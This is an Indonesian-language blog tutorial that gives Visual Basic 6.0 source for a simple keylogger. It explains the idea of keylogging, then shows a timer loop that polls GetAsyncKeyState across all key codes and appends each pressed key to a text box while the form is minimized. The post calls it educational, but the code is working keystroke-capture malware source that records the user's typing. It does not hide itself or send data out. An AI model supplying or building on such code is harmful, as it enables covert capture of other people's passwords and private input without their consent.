Source Code Simple KeyLogger Dengan Visual Basic 6.0 (VB6)

Bagi kalangan pengguna personal komputer (PC) dengan Operating System (OS) Windows pada umumnya sudah tentu tidak asing lagi dengan virus. Jika virus telah masuk ke dalam PC maka sangat menjengkelkan sekali dan sangat menghambat pekerjaan, PC menjadi lambat, sering restart, program-program menjadi error dan tentunya masih banyak sekali hal yang menjengkelkan akibat dari virus tersebut.

Pada kesempatan posting artikel kali ini admin akan sedikit membahas tentang Keylogger. Mendengar kata keylogger langsung terbayang dibenak kita dengan virus komputer. Keylogger mempunyai sebuah arti secara umum yaitu sebuah aplikasi komputer yang sengaja dibuat untuk merekam semua aktifitas dari komputer tersebut. Keylogger berasal dari kata kerja "log". user/program sedang melakukan aktifitas log "logger". Sedangkan kata "logging" berarti adalah kegiatan "merekam" aktifitas log-nya.

Source code simple dengan menerapkan cara kerja dari virus keylogger ini bertujuan hanya untuk pembelajaran dan admin harap bisa dikembangkan ke dalam segi hal positif. Buatlah sebuah Project pada Ms. Visual Basic 6.0 - StandartEXE - Form. Setelah form selesai tambahkan komponen Timmer dan TextBox. Untuk Properties TextBox MultiLine = True dan ScrollBars = 2 - Vertical sedangkan Interval pada Timmer menggunakan nilai angka 2.

Source Code Simple KeyLogger Dengan Visual Basic 6.0 (VB6)

Copykan sintak dibawah ini

Dim HasilRekam As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Private Sub Timer1_Timer()
For I = 1 To 255
    HasilRekam = 0
    HasilRekam = GetAsyncKeyState(I)
    If HasilRekam = -32767 Then
    Text1.Text = Text1.Text + Chr(I)
    End If
Next I
End Sub

Save dan F5/RUN, klik tombol minimize pada form yang di RUN kemudian agan coba tekan tombol pada keyboard (sembarang) setelah itu buka kembali form yang diminimze tadi, perhatikan pada TextBox, aktifitas keyboard yang baru saja agan lakukan telah terekam.

Source Code Simple KeyLogger Dengan Visual Basic 6.0 (VB6)

Cukup mudah dan simple bukan

Related

Visual Basic Classic 4985506146352613740

Post a Comment

Perhatian !!
- Berkomentarlah dengan menggunakan bahasa yang baik dan sopan dan sesuai topik pembahasan
- Dilarang menjadikan referensi artikel web ini tanpa menyertakan sumbernya

emo-but-icon

Terbaru

Random Artikel

Memuat...

Contact Us

Name

Email *

Message *

item